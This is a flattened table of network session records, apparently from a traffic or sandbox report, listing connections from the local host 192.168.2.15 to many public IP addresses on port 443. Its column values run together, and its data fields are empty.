                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17849192.168.2.153570664.104.22.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17850192.168.2.154044439.142.40.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17851192.168.2.1553224217.42.170.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17852192.168.2.1546106174.24.101.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17853192.168.2.1539316115.111.231.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17854192.168.2.15443121.223.103.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17855192.168.2.154206244.197.217.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17856192.168.2.154191813.87.43.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17857192.168.2.1538798218.28.235.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17858192.168.2.1545980216.235.45.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17859192.168.2.155685480.131.183.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17860192.168.2.1559336204.48.206.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17861192.168.2.1558044160.142.127.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17862192.168.2.1544472155.254.119.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17863192.168.2.155163818.128.47.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17864192.168.2.15502581.108.49.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17865192.168.2.1543584174.39.47.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17866192.168.2.1553704111.208.41.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17867192.168.2.1559590139.224.33.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17868192.168.2.1557760106.222.187.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17869192.168.2.1538000205.103.225.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17870192.168.2.155278683.118.239.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17871192.168.2.155897480.32.168.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17872192.168.2.1545724186.126.215.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17873192.168.2.153646483.220.115.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17874192.168.2.155879813.186.171.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17875192.168.2.1549292200.133.20.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17876192.168.2.155689694.44.182.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17877192.168.2.153736227.121.192.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17878192.168.2.1551218142.194.58.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17879192.168.2.1558656206.101.182.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17880192.168.2.156001836.104.242.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17881192.168.2.154790098.163.13.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17882192.168.2.1554098168.96.25.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17883192.168.2.155069679.26.139.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17884192.168.2.154518617.62.122.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17885192.168.2.155936494.197.128.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17886192.168.2.154486239.224.170.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17887192.168.2.1536090193.166.227.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17888192.168.2.1541028161.211.30.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17889192.168.2.1548134115.172.193.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17890192.168.2.154807664.70.241.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17891192.168.2.1536546161.189.161.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17892192.168.2.1560878188.64.157.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17893192.168.2.1540930176.101.8.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17894192.168.2.1536424108.60.222.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17895192.168.2.155320081.34.95.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17896192.168.2.155161020.217.81.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17897192.168.2.1555226142.184.171.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17898192.168.2.1559968221.94.241.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17899192.168.2.1558970169.227.193.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17900192.168.2.1560560102.30.116.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17901192.168.2.1537766154.8.87.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17902192.168.2.155822462.224.195.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17903192.168.2.1538800210.191.109.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17904192.168.2.1560290109.186.61.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17905192.168.2.1550354194.220.182.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17906192.168.2.153757652.242.189.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17907192.168.2.154358686.53.176.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17908192.168.2.155225296.243.236.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17909192.168.2.1542484151.253.146.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17910192.168.2.1543106103.40.130.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17911192.168.2.1538970175.250.198.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17912192.168.2.155179819.240.244.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17913192.168.2.1554228114.127.121.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17914192.168.2.153866050.121.251.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17915192.168.2.1549056134.128.220.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17916192.168.2.1556572156.190.229.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17917192.168.2.1548140209.29.9.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17918192.168.2.154745075.165.185.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17919192.168.2.154354244.248.140.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17920192.168.2.153668072.188.227.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17921192.168.2.1544932113.210.150.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17922192.168.2.155087284.46.72.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17923192.168.2.1556756169.125.239.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17924192.168.2.155984876.23.194.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17925192.168.2.1536576135.160.163.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17926192.168.2.1549522182.6.136.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17927192.168.2.1538306166.118.78.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17928192.168.2.1557128194.183.58.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17929192.168.2.1536762169.120.27.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17930192.168.2.1559106206.188.255.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17931192.168.2.1539174128.160.161.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17932192.168.2.1558636150.235.95.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17933192.168.2.1547876194.195.238.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17934192.168.2.1559552205.109.230.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17935192.168.2.1543052153.113.36.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17936192.168.2.1534610118.46.16.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17937192.168.2.154698065.112.170.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17938192.168.2.1547686126.158.4.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17939192.168.2.1550578155.174.181.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17940192.168.2.1547278160.219.155.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17941192.168.2.154257085.1.247.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17942192.168.2.1547496165.103.80.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17943192.168.2.1545524180.246.59.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17944192.168.2.1560536111.181.8.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17945192.168.2.1554504222.241.8.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17946192.168.2.155143442.249.228.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17947192.168.2.1546208150.138.49.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17948192.168.2.155755042.115.1.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17949192.168.2.1541826222.154.30.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17950192.168.2.155304247.128.73.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17951192.168.2.153395220.252.0.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17952192.168.2.155845447.158.178.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17953192.168.2.154892227.169.40.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17954192.168.2.1553318112.235.249.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17955192.168.2.1553028183.226.165.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17956192.168.2.155524613.23.115.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17957192.168.2.1534054165.154.18.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17958192.168.2.1534400180.164.17.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17959192.168.2.153845836.60.250.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17960192.168.2.155367059.158.170.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17961192.168.2.1549794145.70.113.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17962192.168.2.1536070109.212.126.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17963192.168.2.1547070109.37.133.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17964192.168.2.155885492.10.250.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17965192.168.2.1558888108.96.166.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17966192.168.2.153290881.166.44.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17967192.168.2.153363059.41.123.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17968192.168.2.1539280139.2.129.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17969192.168.2.1555844123.85.174.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17970192.168.2.1544640106.115.46.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17971192.168.2.1534298174.155.52.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17972192.168.2.154198264.148.250.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17973192.168.2.1556780171.38.255.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17974192.168.2.1542156159.185.249.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17975192.168.2.1551900143.135.63.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17976192.168.2.1547384187.130.193.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17977192.168.2.1552498147.132.131.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17978192.168.2.1552518170.215.243.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17979192.168.2.153581662.177.29.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17980192.168.2.155459882.23.220.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17981192.168.2.1541466146.146.248.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17982192.168.2.1532994181.43.172.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17983192.168.2.1538062106.236.35.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17984192.168.2.1554856167.101.161.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17985192.168.2.154869463.247.199.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17986192.168.2.1547328143.15.116.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17987192.168.2.15532664.98.117.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17988192.168.2.1542756113.61.100.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17989192.168.2.1547966115.209.24.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17990192.168.2.154663897.211.185.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17991192.168.2.15458625.157.232.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17992192.168.2.153382212.100.52.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17993192.168.2.1546632164.245.52.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17994192.168.2.1545234174.111.179.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17995192.168.2.1537870156.206.78.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17996192.168.2.1545414145.150.145.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17997192.168.2.155658491.117.253.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17998192.168.2.154936489.158.103.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17999192.168.2.156028231.38.49.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18000192.168.2.1543196141.157.48.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18001192.168.2.1535632137.120.134.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18002192.168.2.1540324170.200.52.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18003192.168.2.1547982211.51.54.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18004192.168.2.1533612186.209.150.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18005192.168.2.1557566135.25.230.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18006192.168.2.1551174212.93.103.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18007192.168.2.1543746130.9.59.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18008192.168.2.1553936111.17.100.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18009192.168.2.1548540180.82.35.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18010192.168.2.1536440169.129.12.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18011192.168.2.1548434124.10.3.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18012192.168.2.1536802186.218.59.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18013192.168.2.1539370192.240.36.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18014192.168.2.1555024182.99.138.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18015192.168.2.1554476161.246.142.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18016192.168.2.1540674121.245.248.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18017192.168.2.1537348202.147.131.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18018192.168.2.1541508164.48.169.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18019192.168.2.153864046.244.63.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18020192.168.2.1549354187.241.238.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18021192.168.2.1548526207.34.66.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18022192.168.2.1536002125.83.247.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18023192.168.2.1536940116.114.113.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18024192.168.2.1550802191.64.198.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18025192.168.2.1533722158.152.251.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18026192.168.2.154427649.36.74.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18027192.168.2.1554926131.25.203.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18028192.168.2.1548676143.137.127.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18029192.168.2.1541022122.172.215.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18030192.168.2.155781463.239.221.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18031192.168.2.1542524118.175.80.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18032192.168.2.1549166173.85.63.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18033192.168.2.1540442128.3.57.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18034192.168.2.1546458222.233.205.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18035192.168.2.1560486192.222.45.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18036192.168.2.1544774169.244.234.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18037192.168.2.1552332209.29.124.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18038192.168.2.1547520174.47.153.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18039192.168.2.1547480197.183.129.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18040192.168.2.1537148119.202.158.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18041192.168.2.155895087.253.120.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18042192.168.2.155947623.232.196.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18043192.168.2.1557944209.59.118.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18044192.168.2.1535934170.162.201.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18045192.168.2.155593082.114.235.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18046192.168.2.1550820170.140.169.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18047192.168.2.1548454216.198.2.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18048192.168.2.1535778171.147.217.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18049192.168.2.153524696.172.194.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18050192.168.2.1545744129.168.23.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18051192.168.2.153616472.122.95.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18052192.168.2.155699899.128.50.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18053192.168.2.1535870157.112.228.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18054192.168.2.1551284156.23.218.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18055192.168.2.1537702162.70.52.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18056192.168.2.1538508193.212.246.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18057192.168.2.1555548121.93.56.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18058192.168.2.155730075.127.224.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18059192.168.2.1547718177.166.42.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18060192.168.2.155965478.25.118.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18061192.168.2.1552110128.233.96.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18062192.168.2.154726097.220.153.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18063192.168.2.1556734152.115.10.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18064192.168.2.154472899.32.241.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18065192.168.2.154442093.105.155.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18066192.168.2.155293863.203.140.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18067192.168.2.1559234158.109.140.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18068192.168.2.1546076219.13.149.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18069192.168.2.153513642.107.88.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
